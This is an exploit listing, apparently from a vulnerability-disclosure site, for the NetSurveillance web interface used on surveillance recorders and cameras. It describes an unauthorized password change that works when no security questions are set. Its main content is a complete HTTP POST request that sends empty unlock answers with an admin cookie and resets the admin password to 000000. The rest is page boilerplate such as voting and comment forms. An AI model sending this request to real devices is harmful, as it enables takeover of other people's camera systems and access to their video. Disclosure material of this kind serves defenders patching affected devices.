NetSurveillance Unauthorized Password Change

2020.11.21

Credit: AsCiI

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: NetSurveillance Web interface password change
# Google Dork:
# Date: 20.10.2020
# Exploit Author: AsCiI
# Vendor Homepage:
# Software Link:
# Version: V4.02.R11.00000140.10001.131900.00000 maybe other
# Tested on: V4.02.R11.00000140.10001.131900.00000 Build Date:2017/12/6 9:4:23
# CVE :
NetSurveillance Web interface password can be changed when
there is no default question set, the answer will be empty
Tested on System: V4.02.R11.00000140.10001.131900.00000
Build Date:2017/12/6 9:4:23
POST /result.html?cLanguage=null HTTP/1.1
Host: [Host_Name]
Referer: http://[Host_Name]/reminder.html
Content-Type: application/x-www-form-urlencoded
Cookie: NetSuveillanceWebCookie=%7B%22username%22%3A%22admin%22%7D
Unlockquestion1=Please+select+Question&Unlockanswer1=&Unlockquestion2=Please+select+Question&Unlockanswer2=&password=000000&confirpossword=000000

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

NetSurveillance Unauthorized Password Change

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.